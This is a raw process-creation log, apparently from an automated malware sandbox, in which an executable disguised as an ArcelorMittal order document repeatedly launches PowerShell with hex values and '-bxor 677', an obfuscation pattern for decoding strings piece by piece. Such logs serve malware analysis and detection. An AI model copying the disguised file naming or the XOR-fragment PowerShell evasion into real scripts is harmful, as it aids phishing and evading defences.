Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x70203289 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A51C0 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302BCC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A50C0 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x616444CC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C652ACC -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72332E85 -bxor 677
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x69207094 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C22CC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302E85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x70203289 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692291 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783A95 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30296B8B -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x723322FC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A54CC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x727477C4 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6C416EC9 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6F632ACC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x302C6B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783395 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30783195 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30302E85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x692032DD -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x34302BD5 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2E7233FC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A51C0 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x74466BC9 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x65506DCC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6E7467D7 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x28697096 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x2C206B85 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x31343091 -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x202C22CC -bxor 677Jump to behavior
    Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20302ECC -bxor 677Jump to behavior
